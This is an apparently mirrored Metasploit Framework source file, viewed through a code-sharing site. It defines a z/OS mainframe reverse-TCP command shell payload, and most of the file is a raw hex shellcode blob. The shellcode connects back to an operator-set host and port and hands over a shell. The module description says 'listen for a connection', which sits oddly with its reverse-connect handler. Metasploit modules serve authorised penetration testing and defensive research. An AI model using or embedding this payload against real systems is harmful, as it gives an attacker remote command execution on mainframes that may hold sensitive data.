Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/mainframe/shell_reverse_tcp.rb
21540 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
# This payload has no ebcdic<->ascii translator built in.

5
# Therefore it must use a shell which does, like mainframe_shell

6
#

7
#

8
##

9


10
module MetasploitModule

11
  CachedSize = 339

12


13
  include Msf::Payload::Single

14
  include Msf::Payload::Mainframe

15
  include Msf::Sessions::CommandShellOptions

16


17
  def initialize(info = {})

18
    super(

19
      merge_info(

20
        info,

21
        'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP Inline',

22
        'Description' => %q{

23
          Listen for a connection and spawn a command shell.

24
          This implementation does not include ebcdic character translation,

25
          so a client with translation capabilities is required.  MSF handles

26
          this automatically.

27
        },

28
        'Author' => 'Bigendian Smalls',

29
        'License' => MSF_LICENSE,

30
        'Platform' => 'mainframe',

31
        'Arch' => ARCH_ZARCH,

32
        'Handler' => Msf::Handler::ReverseTcp,

33
        'Session' => Msf::Sessions::MainframeShell,

34
        'Payload' => {

35
          'Offsets' =>

36
                  {

37
                    'LPORT' => [ 321, 'n' ],

38
                    'LHOST' => [ 323, 'ADDR' ]

39
                  },

40
          'Payload' =>

41
                       "\x18\x7f\xa5\x76\x1f\xff\x41\x17\x01\x54\xd7\xcb\x10\x00\x10\x00" \

42
                       "\x41\xd7\x01\xd8\xa7\x88\x00\x08\xa7\x98\x00\x01\xa7\xa8\x00\x02" \

43
                       "\x41\x07\x01\x1c\x41\x30\x00\x08\x41\x57\x01\x9c\x50\xa7\x01\x9c" \

44
                       "\x50\x97\x01\xa0\x50\x97\x01\xa8\x41\xf7\x00\xcc\x0d\xef\x58\x57" \

45
                       "\x01\xac\x50\x57\x01\xbc\x41\x17\x01\x3e\x41\x57\x01\xbc\xd2\x08" \

46
                       "\x50\x07\x10\x00\x41\x07\x01\x24\x41\x30\x00\x06\x41\x57\x01\xbc" \

47
                       "\x41\xf7\x00\xcc\x0d\xef\xa7\xb8\x00\x02\xa7\xf4\x00\x1e\xa7\xba" \

48
                       "\xff\xff\xec\xb7\xff\xfc\xff\x7e\x41\x17\x01\x48\x50\xa7\x01\x80" \

49
                       "\x41\x27\x01\x80\x50\x20\x10\x10\x41\x27\x01\x3c\x50\x20\x10\x14" \

50
                       "\x50\x97\x01\x54\x41\x07\x01\x2c\x41\x30\x00\x0d\x41\x57\x01\x48" \

51
                       "\x41\xf7\x00\xcc\x0d\xef\x41\x07\x01\x34\x50\x87\x01\x88\x58\x57" \

52
                       "\x01\xac\x50\x57\x01\x84\x50\xb7\x01\x8c\x41\x30\x00\x06\x41\x57" \

53
                       "\x01\x84\x41\xf7\x00\xcc\x0d\xef\xa7\xf4\xff\xd3\x50\xe0\xd0\x08" \

54
                       "\x17\x11\x0a\x08\x50\x0d\x00\x0c\x58\xfd\x00\x0c\xa7\x68\x00\x14" \

55
                       "\x41\x16\xd0\x00\x50\x56\xd0\x00\xa7\x3a\xff\xff\xec\x38\x00\x14" \

56
                       "\x0b\x7e\xa7\x6a\x00\x04\xa7\x5a\x00\x04\xec\x37\xff\xf5\x00\x7e" \

57
                       "\x41\x56\xd0\x00\xa7\x5a\xff\xfc\x96\x80\x50\x00\x05\xef\x58\xe0" \

58
                       "\xd0\x08\x07\xfe\xa7\x5a\x00\x04\xa7\xf4\xff\xed\xc2\xd7\xe7\xf1" \

59
                       "\xe2\xd6\xc3\x40\xc2\xd7\xe7\xf1\xc3\xd6\xd5\x40\xc2\xd7\xe7\xf1" \

60
                       "\xc5\xe7\xc3\x40\xc2\xd7\xe7\xf1\xc6\xc3\xe3\x40\xa2\x88\x10\x02" \

61
                       "\x02\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x07\x61\x82\x89\x95" \

62
                       "\x61\xa2\x88"

63
        }

64
      )

65
    )

66
  end

67
end

68


69